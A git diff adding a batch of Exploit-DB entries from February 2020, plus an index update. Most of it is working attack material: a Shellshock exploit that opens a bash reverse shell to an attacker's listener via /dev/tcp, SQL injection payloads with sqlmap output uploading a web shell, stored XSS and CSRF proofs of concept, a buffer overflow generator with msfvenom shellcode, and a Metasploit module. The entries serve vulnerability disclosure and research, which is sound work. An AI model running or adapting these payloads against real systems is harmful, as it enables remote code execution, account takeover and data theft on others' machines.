diff --git a/exploits/hardware/webapps/48077.txt b/exploits/hardware/webapps/48077.txt new file mode 100644 index 000000000..25f0a8a09 --- /dev/null +++ b/exploits/hardware/webapps/48077.txt @@ -0,0 +1,51 @@ +# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution +# Exploit Author: Sarang Tumne a.k.a SarT +# Date: 2020-02-14 +# Confirmed on release 5.2 +# Vendor: https://www.avaya.com/en/ +# Avaya's advisory: +# https://downloads.avaya.com/css/P8/documents/100183151 +# Exploit generates a reverse shell to a nc listener (Shellshock Exploit) + +############################################### + +#!/usr/bin/python + +import sys +import requests + +if len(sys.argv) < 4: + print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" + print "[*] Usage: " + print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" + print "[*] Netcat Listener: nc -lvvnp " + print "\n" + sys.exit() + +#Disables request warning for cert validation ignore. +requests.packages.urllib3.disable_warnings() +CM = sys.argv[1] +url = "https://" + CM + "/mt/mt.cgi" +attacker_ip = sys.argv[2] +rev_port = sys.argv[3] + +http_headers = { + + "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' + + } + +def main(): + if len(sys.argv) == 4: + + print "[+] Success, spawning a shell on your custom port :)..." + requests.get(url, headers=http_headers, verify=False, timeout=5) + + else: + print "[-] Something went wrong, quitting..." + + sys.exit() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/48090.py b/exploits/java/webapps/48090.py new file mode 100755 index 000000000..33263780b --- /dev/null +++ b/exploits/java/webapps/48090.py @@ -0,0 +1,70 @@ +# Exploit Title: LabVantage 8.3 - Information Disclosure +# Google Dork: N/A +# Date: 2020-02-16 +# Exploit Author: Joel Aviad Ossi +# Vendor Homepage: labvantage.com +# Software Link: N/A +# Version: LabVantage 8.3 +# Tested on: * +# CVE : N/A + + +import requests +import operator + + +def exploit(target): + print("[+] Fetching LabVantage Database Name..") + start = "name=\"database\" id=\"database\" value=\"" + end = "\" >" + vstart = "= 5.0 boolean-based blind - ORDER BY, GROUP BY clause +Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END)) + +Type: time-based blind +Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) +Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1) +--- + + +Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes. \ No newline at end of file diff --git a/exploits/php/webapps/48076.txt b/exploits/php/webapps/48076.txt new file mode 100644 index 000000000..cb8272a90 --- /dev/null +++ b/exploits/php/webapps/48076.txt @@ -0,0 +1,43 @@ +# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting +# Date: 2020-01-23 +# Vendor Homepage: https://strongtestimonials.com +# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt +# Exploit Author: Jinson Varghese Behanan +# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/ +# Author Homepage: https://www.jinsonvarghese.com +# Version: 2.40.0 and below +# CVE : CVE-2020-8549 + +# 1. Description +# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with +# over 90,000 active installations. In the client details section which is seen when adding +# or editing a testimonial, the custom[client_name] and custom[company_name] parameters +# were found to be vulnerable to stored cross-site scripting. All WordPress websites +# using Strong Testimonials version 2.40.0 and below are affected. + +2. Proof of Concept + +When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed. + +The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page. + +POST /wp-admin/post.php HTTP/1.1 +Host: testing.com +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit +Content-Type: application/x-www-form-urlencoded +Content-Length: 1402 +Origin: http://testing.com +Connection: close +Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg +Upgrade-Insecure-Requests: 1 + +_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator + +3. Timeline + +Vulnerability reported to the Strong Testimonials team – January 23, 2020 +Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020 \ No newline at end of file diff --git a/exploits/php/webapps/48082.txt b/exploits/php/webapps/48082.txt new file mode 100644 index 000000000..7d3a6be57 --- /dev/null +++ b/exploits/php/webapps/48082.txt @@ -0,0 +1,40 @@ +# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://icehrm.com/ +# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0 +# Tested on Windows 10/Kali Rolling + +# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change: + +# POC for user creation: + + + + +
+ + + + + + +
+ + + +# POC for Password Change: + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48083.txt b/exploits/php/webapps/48083.txt new file mode 100644 index 000000000..52bcd402c --- /dev/null +++ b/exploits/php/webapps/48083.txt @@ -0,0 +1,25 @@ +# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting +# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply" +# Date: 2020-02-14 +# Category : Webapps +# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip +# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful +# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) +# Team Members: Behzad Khalifeh , Milad Ranjbar +# Version: 3.8 +# Tested on: Windows/Linux +# CVE: N/A + +.:: Theme Description ::. +Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. + +.:: Proof Of Concept (PoC) ::. +Step 1 - Find Your Target With above Dork. +Step 2 - Inject Your Java Script Codes to Name & Email Fields +Step 3 - Click Post Comment + +.:: Tested Payload ::. +'>"> + +.:: Post Request ::. +comment=XSS :)&author='>">&email='>">&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145 \ No newline at end of file diff --git a/exploits/php/webapps/48086.txt b/exploits/php/webapps/48086.txt new file mode 100644 index 000000000..5f4a6cd67 --- /dev/null +++ b/exploits/php/webapps/48086.txt @@ -0,0 +1,69 @@ +# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User) +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://www.soplanning.org/en/ +# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ +# Version 1.45 +# Tested on Windows 10/Kali Rolling + +# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary +# user creation and for changing passwords (Specifically the admin password) + +# POC For aribtrary user creation: +# CSRF POC: + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + +# POC for admin password change: + +# CSRF POC: + + + + +
+ + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48089.txt b/exploits/php/webapps/48089.txt new file mode 100644 index 000000000..7dcfdb2a8 --- /dev/null +++ b/exploits/php/webapps/48089.txt @@ -0,0 +1,67 @@ +# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks, Homebrewer +# Vendor Homepage: https://www.soplanning.org/en/ +# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ +# Version 1.45 +# Tested on Windows 10/Kali Rolling + +The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution. + +Exploit POC: + +Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection. + +Save the admin hash and insert it into SQLMap as such: + +sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell\ + + +Now you have a web shell uploaded to the server: + +11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable +GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N +sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests: +--- +Parameter: users (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3 + +Type: UNION query +Title: MySQL UNION query (NULL) - 42 columns +Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3 +--- +[11:53:02] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.2.26 +back-end DBMS: MySQL >= 5.0.12 +[11:53:02] [INFO] going to use a web backdoor for command prompt +[11:53:02] [INFO] fingerprinting the back-end DBMS operating system +[11:53:02] [INFO] the back-end DBMS operating system is Windows +which web application language does the web server support? +[1] ASP +[2] ASPX +[3] JSP +[4] PHP (default) +> 4 +do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n +[11:53:07] [WARNING] unable to automatically retrieve the web server document root +what do you want to use for writable directory? +[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default) +[2] custom location(s) +[3] custom directory list file +[4] brute force search +> 2 +please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www +[11:53:23] [WARNING] unable to automatically parse any web server path +[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method +[11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' +[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method +[11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query +[11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B) +[11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php + + +Using that webshell you can upload your reverse shell. + +Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist. \ No newline at end of file diff --git a/exploits/windows/local/48075.txt b/exploits/windows/local/48075.txt new file mode 100644 index 000000000..6e1aeef57 --- /dev/null +++ b/exploits/windows/local/48075.txt @@ -0,0 +1,35 @@ +# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path +# Discovery by: Roberto Piña +# Discovery Date: 2020-02-14 +# Vendor Homepage:https://www8.hp.com/mx/es/home.html +# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe +# HP Development Company, L.P. +# Tested Version: 1.2.9.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Home x64 en + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """ +HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto + +C:\>sc qc HPWMISVC +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: HPWMISVC + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : HPWMISVC + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\> +# Exploit: +# A successful attempt would require the local user to be able to insert their code in the system +# root path undetected by the OS or other security applications where it could potentially be +# executed during application startup or reboot. If successful, the local user's code would +# execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/48078.txt b/exploits/windows/local/48078.txt new file mode 100644 index 000000000..7d0804ed4 --- /dev/null +++ b/exploits/windows/local/48078.txt @@ -0,0 +1,27 @@ +# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path +# Exploit Author: boku +# Date: 2020-02-10 +# Vendor Homepage: https://www.weird-solutions.com +# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe +# Version: 2.0.1214 +# Tested On: Windows 10 (32-bit) + +C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """ +BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto + +C:\Users\user>sc qc "BOOTP Turbo" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: BOOTP Turbo + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : BOOTP Turbo + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/48079.txt b/exploits/windows/local/48079.txt new file mode 100644 index 000000000..60cf85d58 --- /dev/null +++ b/exploits/windows/local/48079.txt @@ -0,0 +1,104 @@ +# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation +# Author: nu11secur1ty +# Date: 2020-02-14 +# Vendor: Microsoft +# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty +# CVE: CVE-2020-0683 + + +[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) +[+] Website: https://www.nu11secur1ty.com/ +[+] Source: readme from GitHUB +[+] twitter.com/nu11secur1ty + + +[Exploit Program] +Link: +https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty + + +[Vendor] +Microsoft + + +[Vulnerability Type] +Windows Installer Elevation of Privilege Vulnerability + +[CVE Reference] + +An elevation of privilege vulnerability exists in the Windows Installer +when MSI packages process symbolic links. An attacker who successfully +exploited this vulnerability could bypass access restrictions to add or +remove files. + +To exploit this vulnerability, an attacker would first have to log on to +the system. An attacker could then run a specially crafted application that +could exploit the vulnerability and add or remove files. + +The security update addresses the vulnerability by modifying how to reparse +points are handled by the Windows Installer. + + +[Security Issue] +Elevation of Privilege from user to C:\Windows\administartion execution +files + + +[References] + +# CVE-2020-0683 +Original Poc sent to MSRC. +Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege +https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683 + +Source code for Visual Studio C++ 2019 + +Inside "nu11secur1ty" you'll find the exploit (exe) to execute. + +# Note: + +This test is using `system.ini` in c:\Windows\system.ini +When you exploit this file you should replace with the original file +`system.ini` after this test, which you will find in CVE-2020-0683 +directory :) + +-------------------------------------------------------------------------- + +- - How to run the exploit + +Go into "nu11secur1ty" directory and from a cmd console launch: + +- for the test + +MsiExploit.exe c:\Windows\system.ini" + +Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory. + +- Disclaimer: + + The entry creation date may reflect when the CVE ID was allocated or +reserved, and does not necessarily indicate when this vulnerability +was discovered, shared with the affected vendor, publicly disclosed, +or updated in CVE. + + +- @nu11secur1ty + + +[Network Access] +Local + + +[Disclosure Timeline] +02/11/2020 + +[Disclaimer] + + The entry creation date may reflect when the CVE ID was allocated or +reserved, and does not necessarily indicate when this vulnerability +was discovered, shared with the affected vendor, publicly disclosed, +or updated in CVE. + + +nu11secur1ty +-- \ No newline at end of file diff --git a/exploits/windows/local/48080.txt b/exploits/windows/local/48080.txt new file mode 100644 index 000000000..0a1a8c538 --- /dev/null +++ b/exploits/windows/local/48080.txt @@ -0,0 +1,26 @@ +Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path +Exploit Author: boku +Date: 2020-02-10 +Vendor Homepage: https://www.weird-solutions.com +Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe +Version: 4.6.1298 +Tested On: Windows 10 (32-bit) + +C:\Users\user>sc qc "DHCP Turbo 4" +SERVICE_NAME: DHCP Turbo 4 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DHCP Turbo 4 + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem + +C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo" +DisplayName PathName StartMode +DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto \ No newline at end of file diff --git a/exploits/windows/local/48085.txt b/exploits/windows/local/48085.txt new file mode 100644 index 000000000..bce39a7ab --- /dev/null +++ b/exploits/windows/local/48085.txt @@ -0,0 +1,27 @@ +# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path +# Exploit Author: boku +# Date: 2020-02-10 +# Vendor Homepage: https://www.weird-solutions.com +# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe +# Version: 4.6.1273 +# Tested On: Windows 10 (32-bit) + +C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """ +TFTP Turbo 4 C:\Program Files\TFTP Turbo 4\tftpt.exe Auto + +C:\Users\nightelf>sc qc "TFTP Turbo 4" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: TFTP Turbo 4 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\TFTP Turbo 4\tftpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : TFTP Turbo 4 + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/48087.py b/exploits/windows/local/48087.py new file mode 100755 index 000000000..883167066 --- /dev/null +++ b/exploits/windows/local/48087.py @@ -0,0 +1,65 @@ +# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow +# Exploit Author: boku +# Date: 2020-02-14 +# Vendor Homepage: https://en.softonic.com/author/pxcompany +# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download +# Version: 5.0 +# Tested On: Windows 10 (32-bit) +# +# Recreate: +# 1) Install & Open Cuckoo Clock v5.0 +# 2) Right Click app icon (bottom right), click Alarms +# 3) Click the Add Button +# 4) Run Python script +# 5) Open generated poc.txt, then select-all & copy-all +# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer +# 7) Press Back Button and shellcode will execute + +# EIP Overwrite at 260 Bytes +# Max Buffer space is 1287 bytes +# ESP points to payload at offset 264 bytes +# EBP overwrite at 256 bytes + +# badChars = '\x00\x0d' + +try: + ebpOffset = '\x41'*256 + ebp = '\x42\x42\x42\x42' + eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll] + # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll) + # ESP points to payload at offset 264 bytes + # 1019 bytes = Remaining Buffer Length + fixStack = '\x89\xE5' # mov ebp,esp + fixStack += '\x83\xEC\x30' # sub esp,byte +0x30 + # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode + # x86/shikata_ga_nai chosen with final size 216 + shellcode = b"" + shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4" + shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14" + shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96" + shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a" + shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64" + shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35" + shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34" + shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32" + shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a" + shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d" + shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3" + shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f" + shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c" + shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4" + shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55" + shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a" + shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56" + shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb" + shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48" + shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68" + Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode)) + payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder + File = 'poc.txt' + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/exploits/windows/remote/48092.rb b/exploits/windows/remote/48092.rb new file mode 100755 index 000000000..e661fb7ff --- /dev/null +++ b/exploits/windows/remote/48092.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + PACKET_LEN = 10 + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Anviz CrossChex Buffer Overflow', + 'Description' => %q{ + Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, + triggering a stack buffer overflow. + }, + 'Author' => + [ + 'Luis Catarino ', # original discovery/exploit + 'Pedro Rodrigues ', # original discovery/exploit + 'agalway-r7', # Module creation + 'adfoster-r7' # Module creation + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-12518'], + ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], + ['EDB', '47734'] + ], + 'Payload' => + { + 'Space' => 8947, + 'DisableNops' => true + }, + 'Arch' => ARCH_X86, + 'EncoderType' => Msf::Encoder::Type::Raw, + 'Privileged' => true, + 'Platform' => 'win', + 'DisclosureDate' => '2019-11-28', + 'Targets' => + [ + [ + 'Crosschex Standard x86 <= V4.3.12', + { + 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten + 'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data + 'Shift' => 4 # Positions payload to be written at beginning of ESP + } + ] + ], + 'DefaultTarget' => 0 + )) + deregister_udp_options + register_options( + [ + Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), + Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'), + OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100]) + ]) + end + + def exploit + connect_udp + + res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil)) + if res.empty? + fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast") + end + + print_status "CrossChex broadcast received, sending payload in response" + sploit = rand_text_english(target['Offset']) + sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data + sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP + sploit << payload.encoded + + udp_sock.sendto(sploit, host, port) + print_status "Payload sent" + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 36ca67a50..4625ad9a7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10963,6 +10963,12 @@ id,file,description,date,author,type,platform,port 48070,exploits/windows/local/48070.txt,"SprintWork 2.3.1 - Local Privilege Escalation",2020-02-14,boku,local,windows, 48071,exploits/windows/local/48071.md,"Windows Kernel - Information Disclosure",2020-01-27,Bitdefender,local,windows, 48072,exploits/php/local/48072.php,"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass",2020-01-30,mm0r1,local,php, +48075,exploits/windows/local/48075.txt,"HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path",2020-02-17,"Roberto Piña",local,windows, +48078,exploits/windows/local/48078.txt,"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path",2020-02-17,boku,local,windows, +48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows, +48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, +48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, +48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote 